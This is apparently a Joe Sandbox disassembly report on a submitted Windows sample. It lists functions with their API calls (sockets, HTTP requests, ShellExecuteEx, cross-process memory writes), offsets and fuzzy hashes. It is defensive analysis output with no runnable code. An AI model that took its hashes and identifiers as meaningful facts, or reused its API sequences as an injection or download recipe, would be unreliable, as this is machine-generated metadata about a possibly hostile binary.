                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                        Similarity
                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                        • String ID:
                                                                        • API String ID: 1856069659-0
                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                        • TrackPopupMenuEx.USER32(02F364E0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                        Similarity
                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                        • String ID:
                                                                        • API String ID: 1300944170-0
                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                        Similarity
                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1822080540-0
                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                        Similarity
                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                        • String ID:
                                                                        • API String ID: 659298297-0
                                                                        APIs
                                                                        • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                        • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                        • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                        • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                          • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02F31B58,000000F1,00000000,00000000), ref: 00440E6E
                                                                          • Part of subcall function 00440D98: SendMessageW.USER32(02F31B58,000000F1,00000001,00000000), ref: 00440E9A
                                                                        Similarity
                                                                        • API ID: Window$EnableMessageSend$LongShow
                                                                        • String ID:
                                                                        • API String ID: 142311417-0
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                        • _wcslen.LIBCMT ref: 004458FB
                                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                        • String ID:
                                                                        • API String ID: 3087257052-0
                                                                        APIs
                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                        Similarity
                                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 245547762-0
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        Similarity
                                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                                        • String ID:
                                                                        • API String ID: 2338827641-0
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                        • String ID:
                                                                        • API String ID: 4023252218-0
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Similarity
                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1489400265-0
                                                                        APIs
                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 1042038666-0
                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                        • __getptd.LIBCMT ref: 00417826
                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                        • __lock.LIBCMT ref: 00417844
                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                        • String ID:
                                                                        • API String ID: 938513278-0
                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                        APIs
                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                        • String ID:
                                                                        • API String ID: 2403457894-0
                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                        APIs
                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                        • String ID:
                                                                        • API String ID: 4247068974-0
                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$U$\
                                                                        • API String ID: 0-3705770531
                                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                        APIs
                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                        • String ID: .lnk
                                                                        • API String ID: 886957087-24824748
                                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 708495834-557222456
                                                                        APIs
                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                        • CoInitialize.OLE32(00000000), ref: 00478442
                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                        • CoUninitialize.OLE32 ref: 0047863C
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                        • String ID: .lnk
                                                                        • API String ID: 886957087-24824748
                                                                        APIs
                                                                          • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                          • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                          • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                          • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                          • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                        • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                        • String ID: @
                                                                        • API String ID: 4150878124-2766056989
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \$]$h
                                                                        • API String ID: 4104443479-3262404753
                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                        • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                        • String ID: <$@
                                                                        • API String ID: 2417854910-1426351568
                                                                        APIs
                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                        • String ID:
                                                                        • API String ID: 3705125965-3916222277
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                        • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                        • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem
